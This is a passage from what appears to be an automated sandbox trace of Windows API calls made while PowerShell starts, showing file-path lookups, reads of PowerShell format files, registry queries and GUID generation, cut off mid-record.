lpFilePart=0x0) returned 0x2a [0026.491] GetLastError () returned 0xcb [0026.491] SetErrorMode (uMode=0x1) returned 0x1 [0026.491] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ce574 | out: lpFileInformation=0x1ce574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xbb369540, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xbb369540, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0026.491] GetLastError () returned 0xcb [0026.491] SetErrorMode (uMode=0x1) returned 0x1 [0026.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.493] GetLastError () returned 0xcb [0026.493] SetErrorMode (uMode=0x1) returned 0x1 [0026.493] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce568 | out: lpFileInformation=0x1ce568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0026.499] GetLastError () returned 0xcb [0026.499] SetErrorMode (uMode=0x1) returned 0x1 [0026.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0026.499] GetLastError () returned 0xcb [0026.499] SetErrorMode (uMode=0x1) returned 0x1 [0026.499] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce568 | out: lpFileInformation=0x1ce568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0026.499] GetLastError () returned 0xcb [0026.499] SetErrorMode (uMode=0x1) returned 0x1 [0026.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.499] GetLastError () returned 0xcb [0026.499] SetErrorMode (uMode=0x1) returned 0x1 [0026.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce568 | out: lpFileInformation=0x1ce568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0026.500] GetLastError () returned 0xcb [0026.500] SetErrorMode (uMode=0x1) returned 0x1 [0026.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.500] GetLastError () returned 0xcb [0026.500] SetErrorMode (uMode=0x1) returned 0x1 [0026.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce568 | out: lpFileInformation=0x1ce568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0026.500] GetLastError () returned 0xcb [0026.500] SetErrorMode (uMode=0x1) returned 0x1 [0026.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0026.500] GetLastError () returned 0xcb [0026.500] SetErrorMode (uMode=0x1) returned 0x1 [0026.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce568 | out: lpFileInformation=0x1ce568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0026.501] GetLastError () returned 0xcb [0026.501] SetErrorMode (uMode=0x1) returned 0x1 [0026.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0026.501] GetLastError () returned 0xcb [0026.501] SetErrorMode (uMode=0x1) returned 0x1 [0026.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce568 | out: lpFileInformation=0x1ce568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0026.501] GetLastError () returned 0xcb [0026.501] SetErrorMode (uMode=0x1) returned 0x1 [0026.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0026.501] GetLastError () returned 0xcb [0026.501] SetErrorMode (uMode=0x1) returned 0x1 [0026.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce568 | out: lpFileInformation=0x1ce568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0026.501] GetLastError () returned 0xcb [0026.501] SetErrorMode (uMode=0x1) returned 0x1 [0026.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0026.501] GetLastError () returned 0xcb [0026.501] SetErrorMode (uMode=0x1) returned 0x1 [0026.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce568 | out: lpFileInformation=0x1ce568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0026.502] GetLastError () returned 0xcb [0026.502] SetErrorMode (uMode=0x1) returned 0x1 [0026.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ce0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0026.502] GetLastError () returned 0xcb [0026.502] SetErrorMode (uMode=0x1) returned 0x1 [0026.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce568 | out: lpFileInformation=0x1ce568*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0026.502] GetLastError () returned 0xcb [0026.502] SetErrorMode (uMode=0x1) returned 0x1 [0026.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.503] GetLastError () returned 0xcb [0026.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.517] GetLastError () returned 0xcb [0026.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.518] GetLastError () returned 0xcb [0026.519] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0026.519] GetLastError () returned 0xcb [0026.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.519] GetLastError () returned 0xcb [0026.519] SetErrorMode (uMode=0x1) returned 0x1 [0026.519] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0026.519] GetLastError () returned 0x0 [0026.519] GetFileType (hFile=0x2f8) returned 0x1 [0026.519] SetErrorMode (uMode=0x1) returned 0x1 [0026.519] GetFileType (hFile=0x2f8) returned 0x1 [0026.520] ReadFile (in: hFile=0x2f8, lpBuffer=0x21fe274, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x21fe274*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.521] GetLastError () returned 0x0 [0026.522] ReadFile (in: hFile=0x2f8, lpBuffer=0x21fe274, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x21fe274*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.522] GetLastError () returned 0x0 [0026.523] ReadFile (in: hFile=0x2f8, lpBuffer=0x21fe274, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x21fe274*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.523] GetLastError () returned 0x0 [0026.523] ReadFile (in: hFile=0x2f8, lpBuffer=0x21fe274, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x21fe274*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.523] GetLastError () returned 0x0 [0026.523] ReadFile (in: hFile=0x2f8, lpBuffer=0x21fe274, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x21fe274*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.523] GetLastError () returned 0x0 [0026.523] ReadFile (in: hFile=0x2f8, lpBuffer=0x21fe274, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x21fe274*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.523] GetLastError () returned 0x0 [0026.523] ReadFile (in: hFile=0x2f8, lpBuffer=0x21fe274, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x21fe274*, lpNumberOfBytesRead=0x1ce3e4*=0x9e2, lpOverlapped=0x0) returned 1 [0026.523] GetLastError () returned 0x0 [0026.523] ReadFile (in: hFile=0x2f8, lpBuffer=0x21fd7f6, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x21fd7f6*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.523] GetLastError () returned 0x0 [0026.524] ReadFile (in: hFile=0x2f8, lpBuffer=0x21fe274, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x21fe274*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.524] GetLastError () returned 0x0 [0026.524] CloseHandle (hObject=0x2f8) returned 1 [0026.524] GetLastError () returned 0x0 [0026.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.524] GetLastError () returned 0x0 [0026.524] SetErrorMode (uMode=0x1) returned 0x1 [0026.524] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x220f330 | out: lpFileInformation=0x220f330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0026.524] GetLastError () returned 0x0 [0026.524] SetErrorMode (uMode=0x1) returned 0x1 [0026.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.524] GetLastError () returned 0x0 [0026.524] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce368 | out: phkResult=0x1ce368*=0x2f8) returned 0x0 [0026.524] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x0, lpcbData=0x1ce3ac*=0x0 | out: lpType=0x1ce3b0*=0x1, lpData=0x0, lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.524] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x2b64c0, lpcbData=0x1ce3ac*=0x56 | out: lpType=0x1ce3b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.524] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.524] GetLastError () returned 0x0 [0026.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.525] GetLastError () returned 0x0 [0026.541] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x33e1ddc0, Data2=0x6e91, Data3=0x4eae, Data4=([0]=0xa0, [1]=0x58, [2]=0xaf, [3]=0x9b, [4]=0x52, [5]=0xc2, [6]=0x11, [7]=0x78))) returned 0x0 [0026.554] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xeee77ce0, Data2=0x8b52, Data3=0x4cd8, Data4=([0]=0x8a, [1]=0xdd, [2]=0xbc, [3]=0xf7, [4]=0x1, [5]=0x7b, [6]=0xba, [7]=0xb1))) returned 0x0 [0026.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0026.555] GetLastError () returned 0x0 [0026.555] SetErrorMode (uMode=0x1) returned 0x1 [0026.555] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0026.555] GetLastError () returned 0x0 [0026.555] GetFileType (hFile=0x2f8) returned 0x1 [0026.556] SetErrorMode (uMode=0x1) returned 0x1 [0026.556] GetFileType (hFile=0x2f8) returned 0x1 [0026.556] ReadFile (in: hFile=0x2f8, lpBuffer=0x2222618, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2222618*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.557] GetLastError () returned 0x0 [0026.558] ReadFile (in: hFile=0x2f8, lpBuffer=0x2222618, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2222618*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.558] GetLastError () returned 0x0 [0026.558] ReadFile (in: hFile=0x2f8, lpBuffer=0x2222618, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2222618*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.558] GetLastError () returned 0x0 [0026.559] ReadFile (in: hFile=0x2f8, lpBuffer=0x2222618, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2222618*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.559] GetLastError () returned 0x0 [0026.559] ReadFile (in: hFile=0x2f8, lpBuffer=0x2222618, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2222618*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.559] GetLastError () returned 0x0 [0026.560] ReadFile (in: hFile=0x2f8, lpBuffer=0x2222618, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2222618*, lpNumberOfBytesRead=0x1ce3e4*=0xfb2, lpOverlapped=0x0) returned 1 [0026.560] GetLastError () returned 0x0 [0026.560] ReadFile (in: hFile=0x2f8, lpBuffer=0x2221d6a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2221d6a*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.560] GetLastError () returned 0x0 [0026.560] ReadFile (in: hFile=0x2f8, lpBuffer=0x2222618, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2222618*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.560] GetLastError () returned 0x0 [0026.560] CloseHandle (hObject=0x2f8) returned 1 [0026.560] GetLastError () returned 0x0 [0026.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0026.560] GetLastError () returned 0x0 [0026.560] SetErrorMode (uMode=0x1) returned 0x1 [0026.560] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2242ea8 | out: lpFileInformation=0x2242ea8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0026.560] GetLastError () returned 0x0 [0026.560] SetErrorMode (uMode=0x1) returned 0x1 [0026.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0026.560] GetLastError () returned 0x0 [0026.560] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce368 | out: phkResult=0x1ce368*=0x2f8) returned 0x0 [0026.561] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x0, lpcbData=0x1ce3ac*=0x0 | out: lpType=0x1ce3b0*=0x1, lpData=0x0, lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.561] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x2b64c0, lpcbData=0x1ce3ac*=0x56 | out: lpType=0x1ce3b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.561] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0026.561] GetLastError () returned 0x0 [0026.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0026.561] GetLastError () returned 0x0 [0026.562] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xe5f1e270, Data2=0x135, Data3=0x47bf, Data4=([0]=0x8e, [1]=0xab, [2]=0x8e, [3]=0x49, [4]=0x80, [5]=0x5d, [6]=0x3d, [7]=0x27))) returned 0x0 [0026.569] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xe4f65d8c, Data2=0xe7a5, Data3=0x401b, Data4=([0]=0xb6, [1]=0x48, [2]=0x2, [3]=0xfc, [4]=0x27, [5]=0x4d, [6]=0x8a, [7]=0xc4))) returned 0x0 [0026.572] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x960fdc5d, Data2=0xd4a8, Data3=0x42b2, Data4=([0]=0x80, [1]=0xf5, [2]=0x6e, [3]=0xf6, [4]=0x27, [5]=0x73, 